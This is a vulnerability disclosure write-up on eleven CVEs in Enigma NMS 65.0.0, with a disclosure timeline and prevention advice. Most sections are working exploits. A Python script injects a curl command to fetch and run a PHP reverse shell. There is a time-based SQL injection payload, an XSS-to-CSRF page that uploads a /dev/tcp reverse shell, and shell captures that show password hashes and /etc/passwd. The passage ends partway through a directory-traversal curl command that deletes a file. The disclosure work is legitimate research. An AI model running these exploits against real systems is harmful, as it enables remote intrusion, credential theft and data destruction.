(CVE-2019-16061 –> CVE-2019-16072) Enigma NMS Multiple Vulnerabilities
#--------------------------------------------------------------------
# Multiple Vulnerabilities
# NETSAS Pty Ltd's Enigma NMS
# Working exploits: Yes
# Vendor Homepage: https://www.netsas.com.au/
# Software Link: https://www.netsas.com.au/enigma-nms-introduction/
# Version: Enigma NMS 65.0.0
# Public Disclosure Date: 22 August 2019 (30 days)
# CVE-IDs: CVE-2019-16061 > CVE-2019-16072
# Author: Mark Cross (@xerubus | mogozobo.com)
#--------------------------------------------------------------------
On the 20th July 2019 I discovered multiple vulnerabilities (11 CVEs) in NETSAS Pty Ltd’s Enigma NMS system. Exploitation of these vulnerabilities allows unauthenticated attackers to remotely execute arbitrary code, perform SQL injection attacks exposing sensitive data, utilise the SNMP protocol to inject malicious code, and perform a number of other attack vectors against the NMS system.
For those who know me, you would have heard me be rather outspoken in regards to my distrust and frustrations around the whole coordinated and/or full disclosure process. To my surprise however, this particular exercise has been a perfect example of how researchers and vendors can work closely together to achieve the same goals; mitigation of risk. I believe in kudos where they are due, and NETSAS Pty Ltd (NETSAS) rightfully deserve kudos for their efforts, trust, communication, and reasonable behaviour during this disclosure exercise. From the first day of contact, NETSAS have been proactive, supportive, and have shown that they take security of their product very seriously. Well done NETSAS.
With that out of the way, let’s get stuck into the detail.
====================
Summary
====================
Product: Enigma NMS
Version: Latest version (65.0.0) and prior
Vendor: NETSAS Pty Ltd
CVE-IDs: CVE-2019-16061 > CVE-2019-16072 (11 CVEs)
NETSAS Pty Ltd’s Enigma NMS product “is a market disruptor in the Enterprise Network Management, Monitoring and Managed Services Tools sectors. It has comprehensive unique features, industry best practices, enterprise design, extensive scalability, automation and stability. The low cost, flexible pricing model allows our customers to manage, monitor, report and alert on everything across their entire enterprise, OT and IoT infrastructures, regardless of their size or complexity. Enigma provides substantial visibility and full environmental awareness, enabling network professionals to be more proactive in fault prediction, detection, analysis, reporting and efficient decision making.“. Further information can be found HERE .
The following vulnerabilities have been discovered in NETSAS Pty Ltd’s Enigma NMS version 65.0.0:
- OS Command Injection (CVE-2019-16072)
- SQL Injection (SQLi) (CVE-2019-16065)
- Stored Cross-site Scripting (XSS) (CVE-2019-16069 & CVE-2019-16070)
- Cross-Site Request Forgery (CSRF) (CVE-2019-16068)
- Unrestricted Upload of File with Dangerous Type (CVE-2019-16066)
- Directory Traversal (CVE-2019-16064)
- Improper Authorisation Allowing Privileged Access (CVE-2019-16071)
- Incorrect Default Permissions (CVE-2019-16061)
- Missing Encryption of Sensitive Data (CVE-2019-16062)
- Basic Authentication over HTTP (CVE-2019-16067)
Customers using Enigma NMS are advised to update to the latest patched version available from NETSAS Pty Ltd as soon as possible.
====================
Disclosure Timeline
====================
20 July 2019
– Vulnerabilities discovered. Further testing commenced.
24 July 2019
– Disclosed vulnerabilities to NETSAS Pty Ltd (NETSAS); 30 day disclosure time advised (23 August 2019)
– NETSAS confirmed receipt of vulnerabilities and commenced mitigation activities
13 August 2019
– Contacted NETSAS to check progress of mitigation activities
– NETSAS advised that almost all patches are complete
18 August 2019
– NETSAS provided patches for multiple vulnerabilities for re-testing
– Advised NETSAS that the majority of issues have been patched. Further patching effort required for two vulnerabilities.
– NETSAS provided further patch. Re-testing successful.
20 August 2019
– NETSAS advised new distro archives have been created with all patches included
– Advised NETSAS that one final vulnerability requires further patching
21 August 2019
– CVE-IDs requested from Mitre
– NETSAS advised they are happy for public disclosure to occur on the 22nd August 2019
23 August 2019
– Public disclosure of vulnerabilities
07 September 2019
– Mitre allocate CVE-IDs
#------------------------------------------------------------------------------------
# 01. OS Command Injection
# CVE-ID: Requested - CVE-2019-16072
# CWE-ID: CWE-78: Improper Neutralisation of Special Elements used in an OS Command
# Exploit-DB ID: TBA
#------------------------------------------------------------------------------------
====================
Tested versions / Platform
====================
NETSAS Pty Ltd’s Enigma NMS version 65.0.0 and prior
====================
Details
====================
It is possible to execute arbitrary OS commands on the server hosting Enigma NMS via the vulnerable web application due to the passing of unsafe user supplied data to the system’s shell. Functionality in the ‘snmp_browser‘ action within the ‘discover_and_manage.cgi” script provides users with the ability to use SNMP to browse MIBs on devices via the ‘SNMP MIB Browser‘ tool.
Due to improper input sanitising, it is possible for an attacker to inject operating system commands into the ‘ip_address’ variable by using the pipe symbol (|). As an example, the ‘ip_address‘ variable could contain the following string: “|ping 192.168.128.101“, which would execute the legitimate SNMP query against the host as well as execute an unauthorised ping to 192.168.128.101. The following command snippet shows the command injection request:
|
1 |
http://<enigma-nms-ip>/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|ping+192.168.128.101&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1 |
The following snippet shows the unauthorised OS command being executed as on the Enigma NMS server:
|
1 2 3 4 5 |
[root@enigma-nms]# ps aux | grep [p]ing apache 15112 0.0 0.0 11340 1176 ? S 13:29 0:00 sh -c /bin/ping -c 1 |ping 192.168.128.101 > /dev/null apache 15114 0.0 0.0 6412 636 ? S 13:29 0:00 ping 192.168.128.101 You have new mail in /var/spool/mail/root [root@enigma-nms]# |
====================
Exploit difficulty
====================
It is possible for an attacker to perform the command injection from an authenticated, least privileged perspective. An attacker who successfully exploits the OS command injection vulnerability can execute arbitrary code on the target system with the same privilege rights and context of the user running the process.
====================
Vulnerability Prevention
====================
In order to prevent OS command injection, implement sanitisation of invalid characters by creating a white-list of allowable characters or commands which may be used during user input. Escape or filter special characters and ensure that the web application and its components do not permit OS command execution.
For further information on preventing OS command injection based attacks refer to the following prevention cheat sheet from OWASP HERE
====================
Proof of Concept
====================
The following snippet shows my proof of concept code being executed to obtain a reverse shell with on the vulnerable Enigma NMS server and view the contents of file which contains the hashed passwords of all Enigma NMS users on the system:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 |
_ _ ___ (~ )( ~) / \_\ \/ / | D_ ]\ \/ -= Enigma NMS Reverse Shell by @xerubus =- | D _]/\ \ -= We all have something to hide =- \___/ / /\ \ (_ )( _) @Xerubus Enter Enigma NMS IP address: 192.168.128.240 Enter Attacker IP address: 192.168.128.101 Enter reverse shell port: 20000 Enter web server port: 8000 Enter Username: lowpriv Enter Password (no echo): [+] Building PHP reverse shell [+] Hosting PHP reverse shell [+] Creating listener on port 20000 [+] Sending payload listening on [any] 20000 ... 192.168.128.240 - - [23/Jul/2019 14:04:51] "GET /evil.php HTTP/1.1" 200 - connect to [192.168.128.101] from (UNKNOWN) [192.168.128.240] 34815 bash: no job control in this shell bash-4.1$ id;cat /etc/httpd/etc/.htpasswd id;cat /etc/httpd/etc/.htpasswd uid=48(apache) gid=48(apache) groups=48(apache) admin:pVjR8rECLd1L. pdf_export_user:YFbi55Mf/OYVw lowpriv:yRCsyWfCPp/cU bash-4.1$ |
The following proof of concept (POC) code will be submitted to exploit-db at the end of the 30 day disclosure period.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 |
#!/usr/bin/python #--------------------------------------------------------------------# # Exploit Title: Enigma NMS OS Command Injection # # Date: 21 July 2019 # # Author: Mark Cross (@xerubus | mogozobo.com) # # Vendor: NETSAS Pty Ltd # # Vendor Homepage: https://www.netsas.com.au/ # # Software Link: https://www.netsas.com.au/enigma-nms-introduction/ # # Version: Enigma NMS 65.0.0 # # CVE-IDs: CVE-2019-16072 # # Full write-up: https://www.mogozobo.com/?p=3647 # #--------------------------------------------------------------------# import sys, time, os, subprocess, signal, requests, socket, SocketServer, SimpleHTTPServer, threading os.system('clear') print("""\ _ _ ___ (~ )( ~) / \_\ \/ / | D_ ]\ \/ -= Enigma NMS Reverse Shell by @xerubus =- | D _]/\ \ -= We all have something to hide =- \___/ / /\ \\ (_ )( _) @Xerubus """) enigma_host = raw_input("Enter Enigma NMS IP address:\t") attack_host = raw_input("Enter Attacker IP address:\t") rev_sh_port = raw_input("Enter reverse shell port:\t") web_svr_port = raw_input("Enter web server port:\t\t") user = raw_input("Enter Username:\t\t\t") os.system("stty -echo") password = raw_input("Enter Password (no echo):\t") os.system("stty echo") enigma_url = "http://" + enigma_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|curl%20" + attack_host + ":" + web_svr_port + "/evil.php|php&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1" enigma_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://" + attack_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser", "Connection": "close", "Upgrade-Insecure-Requests": "1"} print "\n\n[+] Building PHP reverse shell" f=open("evil.php","w") f.write("<?php\nexec(\"/bin/bash -c \'bash -i >& /dev/tcp/" + attack_host + "/" + rev_sh_port + " 0>&1\'\");\n?>\n") f.close() # Create simple webserver hosting evil php file print "[+] Hosting PHP reverse shell" web_svr_port = str(web_svr_port) web_svr = subprocess.Popen(["python", "-m", "SimpleHTTPServer", web_svr_port], stdout=subprocess.PIPE, shell=False, preexec_fn=os.setsid) # Create netcat listener print "[+] Creating listener on port " + rev_sh_port subprocess.Popen(["nc", "-nvlp", rev_sh_port]) # Send payload to Enigma NMS print "[+] Sending payload\n" try: r = requests.get(enigma_url, headers=enigma_headers, auth=(user, password)) except: pass print "\n[+] Cleaning up mess..." # Shut down http server os.killpg(os.getpgid(web_svr.pid), signal.SIGTERM) |
#------------------------------------------------------------------------------------
# 02. SQL Injection (SQLi)
# CVE-ID: Requested - CVE-2019-16065
# CWE-ID: CWE-89: Improper Neutralization of Special Elements used in an SQL Command
# Exploit-DB ID: TBA
#------------------------------------------------------------------------------------
====================
Tested versions / Platform
====================
NETSAS Pty Ltd’s Enigma NMS version 65.0.0 and prior
====================
Details
====================
A remote SQL injection web vulnerability was discovered in the Enigma NMS web application which allows an attacker to execute SQL commands to expose and compromise the web server, expose database tables and values, and potentially execute system based commands as the ‘mysql‘ user.
The “search_pattern” value of the “manage_hosts_short.cgi” script is able to be exploited via a GET request, allowing attackers to inject SQL queries.
====================
Exploit difficulty
====================
It is possible for an attacker to perform the SQL injection from low privileged authenticated perspective. An attacker who successfully exploits the SQL injection vulnerability can successfully inject arbitrary queries on the target system with the same privilege rights and context of the user running the mysql process.
====================
Vulnerability Prevention
====================
For further information on preventing SQLi based attacks refer to the following prevention cheat sheet from OWASP HERE
====================
Proof of Concept
====================
The following proof of concept demonstrates the ability to use a SQL injection to obtain all table names in the NMS database:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 |
temptress > sqlmap --auth-type=BASIC --auth-cred="lowpriv:password" -u 'http://<enigma_nms_server>/cgi-bin/protected/manage_hosts_short.cgi?action=search_proceed&search_pattern=a' --dbms=MySQL -D nms --common-tables --- Parameter: search_pattern (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: action=search_proceed&search_pattern=a%' AND SLEEP(5) AND '%'=' --- web server operating system: Linux CentOS 6.8 web application technology: Apache 2.2.15 back-end DBMS: MySQL >= 5.0.0 Database: nms [189 tables] +----------------------------------------+ | action | | accmgr | | account | | aclass | | alert_event_type | | alert_type | | alerts | | app_monitor_protocol | | attributed_to | | bandwidth | | billing | | broadcasts | | carriage_sub_product | | carriage_sub_product_carriage_type_map | | carriage_type | | carriage_type_bandwidth_map | ---snip--- ---snip--- | system_key | | system_setting | | system_setting_type | | system_update | | table_list | | tacacs | | tacacs_group | | tacacs_log | | temp_timestamp | | timezone | | tm_log | | trapdlog_pattern_action_map | | trapdlog_pattern_vendor_map | | typ | | tz | | unique_ip_route | | update_db_info | | vendor | | vlan | | vlan_dat | | voip | | web_view | | wg | | x86_64 | | zone_info | +----------------------------------------+ |
The following proof of concept (POC) code will be submitted to exploit-db at the end of the 30 day disclosure period.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
#--------------------------------------------------------------------# # Exploit Title: Enigma NMS search_pattern SQL Injection # # Date: 21 July 2019 # # Author: Mark Cross (@xerubus | mogozobo.com) # # Vendor: NETSAS Pty Ltd # # Vendor Homepage: https://www.netsas.com.au/ # # Software Link: https://www.netsas.com.au/enigma-nms-introduction/ # # Version: Enigma NMS 65.0.0 # # CVE-IDs: Requested - CVE-2019-16065 # # Full write-up: https://www.mogozobo.com/?p=3647 # #--------------------------------------------------------------------# _ _ ___ (~ )( ~) / \_\ \/ / | D_ ]\ \/ -= Enigma SQLi by @xerubus =- | D _]/\ \ -= We all have something to hide =- \___/ / /\ \\ (_ )( _) @Xerubus Request: http://<enigma_nms_ipaddr>/cgi-bin/protected/manage_hosts_short.cgi?action=search_proceed&search_pattern= Vulnerable Parameter: search_pattern (GET) Payload: action=search_proceed&search_pattern=a%' AND SLEEP(5) AND '%'=' |
#-----------------------------------------------------------------------------
# 03. Cross-site Scripting (XSS) via SNMP Discovery & Web Input Fields
# CVE-ID: CVE-2019-16069 & CVE-2019-16070
# CWE-ID: CWE-79: Improper Neutralization of Input During Web Page Generation
#-----------------------------------------------------------------------------
====================
Tested versions / Platform
====================
NETSAS Pty Ltd’s Enigma NMS version 65.0.0 and prior
====================
Details
====================
A number of stored Cross-site Scripting (XSS) vulnerabilities were identified in NETSAS Pty Ltd’s Enigma NMS which could allow a threat actor to inject malicious code directly into the application through the SNMP protocol as well as via web application form inputs. By including malicious data in the sysDescr, sysContact, sysName, or sysLocation OID’s, and potentially other string based OID’s, it is possible for a malicious actor to exploit the vulnerabilities and inject persistent data into the Enigma NMS. Furthermore, a large number of forms which allow user input strings within Enigma NMS are also vulnerable to XSS injection.
====================
Exploit difficulty
====================
It is possible for an attacker to perform an XSS attack from an unauthenticated perspective by embedding malicious code in the SNMP configuration of a device on the broadcast network managed by the Enigma NMS, or from an authenticated perspective by placing malicious code directly into form input fields. An attacker with authenticated access can also trigger the exploit by performing a SNMP query against their malicious device via Enigma’s SNMP MIB Browser function in Tools. An attacker who successfully exploits the XSS vulnerabilities can run arbitrary code on the client target system.
====================
Vulnerability Prevention
====================
For further information on preventing XSS based attacks refer to the following prevention cheat sheet from OWASP HERE
====================
Proof of Concept
====================
The following proof of concept will inject JavaScript into the Enigma NMS application when it queries the SNMP sysDescr OID configured on the attacking device. Once the code is injected, Enigma NMS will be instructed to download a PHP file and store it in a world-readable and world-writeable location which the attacker can browse to in order to create a reverse shell on the Enigma NMS server.
# Step 1:
Create or edit the SNMPD configuration with the following contents for the sysDescr OID (Do not forget to restart the SNMPD service):
|
1 |
sysDescr <script>window.location='http://<attacking_host_ipaddr>/evil.html'</script> |
# Step 2:
Host the following HTML file on the attacking system. Replace <enigma_nms_ipaddr> with the IP address of the victim Enigma NMS server, and <attacking_host_ipaddr> with the IP address of the host which will receive the reverse shell.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 |
<html> <script>history.pushState('', '', '/')</script> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/<enigma_nms_ipaddr>\/cgi-bin\/protected\/manage_files.cgi", true); xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------208051173310446317141640314495"); xhr.withCredentials = true; var body = "-----------------------------208051173310446317141640314495\r\n" + "Content-Disposition: form-data; name=\"action\"\r\n" + "\r\n" + "system_upgrade\r\n" + "-----------------------------208051173310446317141640314495\r\n" + "Content-Disposition: form-data; name=\"action_aux\"\r\n" + "\r\n" + "upload_file_complete\r\n" + "-----------------------------208051173310446317141640314495\r\n" + "Content-Disposition: form-data; name=\"upfile\"; filename=\"evil.php\"\r\n" + "Content-Type: application/x-php\r\n" + "\r\n" + "\x3c?php\n" + "\n" + "exec(\"/bin/bash -c \'bash -i \x3e& /dev/tcp/<attacking_host_ipaddr>/1337 0\x3e&1\'\");\n" + "\n" + "?\x3e\n" + "\r\n" + "-----------------------------208051173310446317141640314495\r\n" + "Content-Disposition: form-data; name=\"upfile_name\"\r\n" + "\r\n" + "evil.php\r\n" + "-----------------------------208051173310446317141640314495--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } submitRequest(); window.location='http://<enigma_nms_ipaddr>/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser'; </script> <body onload="submitRequest();" > </body> </html> |
# Step 3:
Create a reverse shell listener on the attack host (nc -nvlp 1337).
# Step 4:
Once the Enigma NMS server has connected to your running web service hosting the malicious HTML file, browse to the following location to trigger the reverse shell (replace <enigma_nms_ipaddr> with the IP address of the victim Enigma NMS server):
|
1 |
http://<enigma_nms_ipaddr>/docs/system_upgrade/evil.php |
# Step 5:
A wild reverse shell appears! The following snippet shows the successful reverse shell received from the Enigma NMS server during testing.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 |
> nc -nvlp 1337 listening on [any] 1337 ... connect to [192.168.7.101] from (UNKNOWN) [192.168.7.240] 53748 bash: no job control in this shell bash-4.1$ id; cat /etc/passwd id; cat /etc/passwd uid=48(apache) gid=48(apache) groups=48(apache) root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rtkit:x:499:496:RealtimeKit:/proc:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin saslauth:x:498:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin amandabackup:x:33:6:Amanda user:/var/lib/amanda:/bin/bash mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash pulse:x:497:494:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin dovenull:x:496:491:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin admin:x:500:500:System Admin:/home/admin:/bin/bash _flowd:x:501:501::/home/_flowd:/bin/bash bash-4.1$ |
#----------------------------------------------------
# 04. Cross-Site Request Forgery (CSRF)
# CVE-ID: CVE-2019-16068
# CWE-ID: CWE-252: Cross-Site Request Forgery (CSRF)
# Exploit-DB ID: To be submitted
#----------------------------------------------------
====================
Tested versions / Platform
====================
NETSAS Pty Ltd’s Enigma NMS version 65.0.0 and prior
====================
Details
====================
A CSRF vulnerability exists which allows an attacker to be able to trick a victim into submitting a malicious request into Enigma NMS. The CSRF vulnerability can be triggered via XSS or IFRAME tag included within the site.
====================
Exploit difficulty
====================
It is possible for an attacker to have malicious code executed via CSRF by exploiting XSS vulnerabilities currently present in Enigma NMS. Whilst the attacker can inject the code from an unauthenticated position via SNMP XSS injection, the victim is required to be logged in to Enigma NMS in order to trigger the exploit process.
====================
Vulnerability Prevention
====================
For further information on preventing CSRF based attacks refer to the following prevention cheat sheet from OWASP HERE
====================
Proof of Concept
====================
For a full CSRF example, see the POC outlined in vulnerability “03. Cross-site Scripting (XSS) via SNMP Discovery“. The following proof of concept (POC) code will be submitted to exploit-db at the end of the 30 day disclosure period.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 |
#--------------------------------------------------------------------# # Exploit Title: Enigma NMS Cross-Site Request Forgery (CSRF) # # Date: 21 July 2019 # # Author: Mark Cross (@xerubus | mogozobo.com) # # Vendor: NETSAS Pty Ltd # # Vendor Homepage: https://www.netsas.com.au/ # # Software Link: https://www.netsas.com.au/enigma-nms-introduction/ # # Version: Enigma NMS 65.0.0 # # CVE-IDs: CVE-2019-16068 # # Full write-up: https://www.mogozobo.com/?p=3647 # #--------------------------------------------------------------------# _ _ ___ (~ )( ~) / \_\ \/ / | D_ ]\ \/ -= Enigma CSRF by @xerubus =- | D _]/\ \ -= We all have something to hide =- \___/ / /\ \\ (_ )( _) @Xerubus The following CSRF will create a PHP file for executing a reverse shell on port 1337 via the user upload functionality within the NMS web application. <html> <script>history.pushState('', '', '/')</script> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/<enigma_nms_ipaddr>\/cgi-bin\/protected\/manage_files.cgi", true); xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------208051173310446317141640314495"); xhr.withCredentials = true; var body = "-----------------------------208051173310446317141640314495\r\n" + "Content-Disposition: form-data; name=\"action\"\r\n" + "\r\n" + "system_upgrade\r\n" + "-----------------------------208051173310446317141640314495\r\n" + "Content-Disposition: form-data; name=\"action_aux\"\r\n" + "\r\n" + "upload_file_complete\r\n" + "-----------------------------208051173310446317141640314495\r\n" + "Content-Disposition: form-data; name=\"upfile\"; filename=\"evil.php\"\r\n" + "Content-Type: application/x-php\r\n" + "\r\n" + "\x3c?php\n" + "\n" + "exec(\"/bin/bash -c \'bash -i \x3e& /dev/tcp/<attacking_host_ipaddr>/1337 0\x3e&1\'\");\n" + "\n" + "?\x3e\n" + "\r\n" + "-----------------------------208051173310446317141640314495\r\n" + "Content-Disposition: form-data; name=\"upfile_name\"\r\n" + "\r\n" + "evil.php\r\n" + "-----------------------------208051173310446317141640314495--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } submitRequest(); window.location='http://<enigma_nms_ipaddr>/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser'; </script> <body onload="submitRequest();" > </body> </html> |
#------------------------------------------------------------------
# 05. Unrestricted Upload of File with Dangerous Type
# CVE-ID: CVE-2019-16066
# CWE-ID: CWE-434: Unrestricted Upload of File with Dangerous Type
#------------------------------------------------------------------
====================
Tested versions / Platform
====================
NETSAS Pty Ltd’s Enigma NMS version 65.0.0 and prior
====================
Details
====================
Enigma NMS allows users to upload latest versions of Enigma NMS in order to upgrade the current system or to upload files to their personal documents.
The upload instructions for system upgrade specify that file of the type tar.gz and MD5 checksum are to be uploaded in order to upgrade the system, however Enigma NMS allows the user to upload files of any type. Once a file is uploaded, it is stored in the /var/www/html/docs/system_upgrade/ location and given chmod 777 (rwx all) permissions.
All users have the ability to upload files to their personal documents storage. Once a file is uploaded, it is stored in the /var/www/html/docs/per/ location.
By uploading a malicious PHP file, it is possible for the attacker to gain access to the Enigma NMS operating system and execute arbitrary code.
====================
Exploit difficulty
====================
An attacker with low privileged access can upload a malicious PHP or other file type and execute the script with the permissions of the account running the web server process.
If an attacker wishes to exploit the system upgrade file upload vulnerability, they may leverage a number of vulnerabilities in order to trick an administrative user into uploading the file/s to the server.
====================
Vulnerability Prevention
====================
Only allow a user to upload files of a permitted type and ensure that the file contents do not contain malicious code. For further information regarding file upload protection, refer to the following cheat sheet from OWASP HERE
If PHP is not required within the function of Enigma NMS, ensure that it is disabled or removed. Should PHP be required, refer to the following prevention cheat sheet from OWASP regarding PHP security HERE
====================
Proof of Concept
====================
# Step 1:
Create an evil.php file with the following content (replace <attacker_ipaddr> with the IP address of the listening host and replace the <rev_shell_port> with the listening port):
|
1 2 3 |
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/<attacker_ipaddr>/<rev_shell_port> 0>&1'"); ?> |
# Step 2:
As a low privileged user, access your documents at the following URL http://<enigma_nms_ipaddr>/cgi-bin/protected/manage_files.cgi?action=view_per_docs and upload the previously created evil.php script.
# Step 3:
Create a reverse shell listener on the attack host (nc -nvlp ).
# Step 4:
Click on the evil.php file located in the personal documents to trigger the reverse shell. The following snippet shows the execution of the reverse shell on the attacker’s host:
|
1 2 3 4 5 6 7 8 9 |
temptress > nc -nvlp 1337 listening on [any] 1337 ... connect to [192.168.7.101] from (UNKNOWN) [192.168.7.240] 34810 bash: no job control in this shell bash-4.1$ id; pwd id; pwd uid=48(apache) gid=48(apache) groups=48(apache) /var/www/html/docs/per/59/ bash-4.1$ |
#-----------------------------------------------------------------------------
# 06. Directory Traversal
# CVE-ID: CVE-2019-16064
# CWE-ID: CWE-22: Improper Limitation of a Pathname to a Restricted Directory
#-----------------------------------------------------------------------------
====================
Tested versions / Platform
====================
NETSAS Pty Ltd’s Enigma NMS version 65.0.0 and prior
====================
Details
====================
NETSAS Pty Ltd’s Enigma NMS suffers from a directory traversal vulnerability which can allow an authenticated user to access files and directories stored outside of the web root folder. By exploiting this vulnerability, it is possible for an attacker to list operating system directory contents on the server, create directories and upload files in permissible locations, as well as modify filenames and delete files which are accessible by the user running the web server instance.
====================
Exploit difficulty
====================
It is possible for any user logged in to Enigma NMS to exploit the directory traversal vulnerability and list operating system contents, create directories, upload files, modify filename, and delete files.
====================
Vulnerability Prevention
====================
For further information on preventing directory traversal based attacks, refer to the following prevention cheat sheet from OWASP HERE
====================
Proof of Concept
====================
# POC 1:
The following URL will exploit the directory traversal vulnerability and list contents of /etc on the server running Enigma NMS:
|
1 |
http://192.168.7.240/cgi-bin/protected/manage_files.cgi?action=view_per_docs&per_id=36&dir_web_path_new=/Archive/../../../../../../../etc |
# POC 2:
The following curl POC will delete the file ‘manage_logs.cgi_admin_temp.txt‘ from the operating system directory of /tmp (replace <enigma_nms_ipaddr>> with the IP address of the Enigma NMS server):
|
1 2 3 4 |
curl -i -s -k -X $'POST' \ -H $'Host: <enigma_nms_ipaddr>' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: http://<enigma_nms_ipaddr>/cgi-bin/protected/manage_files.cgi?action=view_per_docs&per_id=36&dir_web_path_new=/Archive/../../../../../../../tmp&action_aux=delete&name_to_delete=manage_logs.cgi_admin_temp.txt' -H $'Content-Type: multipart/form-data; boundary=---------------------------9188732181395748786103185051' -H $'Content-Length: 727' -H $'Authorization: Basic YWRtaW46cGFzc3dvcmQ=' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ --data-binary $'-----------------------------9188732181395748786103185051\x0d\x0aContent-Disposition: form-data; name=\"action\"\x0d\x0a\x0d\x0aview_per_docs\x0d\x0a-----------------------------9188732181395748786103185051\x0d\x0aContent-Disposition: form-data; name=\"per_id\"\x0d\x0a\x0d\x0a36\x0d\x0a-----------------------------9188732181395748786103185051\x0d\x0aContent-Disposition: form-data; name=\"dir_web_path_new\"\x0d\x0a\x0d\x0a/Archive/../../../../../../..//tmp\x0d\x0a-----------------------------9188732181395748786103185051\x0d\x0aContent-Disposition: form-data; name=\"action_aux\"\x0d\x0a\x0d\x0adelete_complete\x0d\x0a-----------------------------9188732181395748786103185051\x0d\x0aContent-Disposition: form-data; 